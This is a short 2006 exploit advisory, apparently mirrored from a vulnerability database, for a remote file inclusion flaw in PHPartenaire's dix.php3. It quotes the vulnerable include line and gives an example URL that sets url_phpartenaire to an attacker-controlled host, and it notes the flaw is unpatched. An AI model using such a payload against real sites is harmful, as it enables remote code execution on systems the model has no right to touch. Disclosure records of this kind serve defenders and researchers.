Lucene search
SecurityvulnsSECURITYVULNS:DOC:14373HistorySep 21, 2006 - 12:00 a.m.
PHPartenaire => $url_phpartenaire Remote File Inclusion Exploit
2006-09-2100:00:00
vulners.com
11
#===================================================================================#
PHPartenaire => $url_phpartenaire Remote File Inclusion Exploit
#===================================================================================#
Softname : PHPartenaire
Url : http://ograweb.free.fr/phpartenaire/
Exploit type : Remote File Inclusion.
Critical: Dangerous.
Solution Status: Unpatched.
#===================================================================================#
By DaDIsS - Member of the Moroccan Hackers Team
#===================================================================================#
Exploit Explanation :
The flaw resides in dix.php3 file that contain this code :
in line 9 :
include($url_phpartenaire."/config.php3");
#===================================================================================#
Example :
http://www.victime.com/(path)/dix.php3?url_phpartenaire=http://attacker
#================================================================#
Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#===================================================================================#
DaDIsS / [email protected]
Proud to be a Moroccan !
#===================================================================================#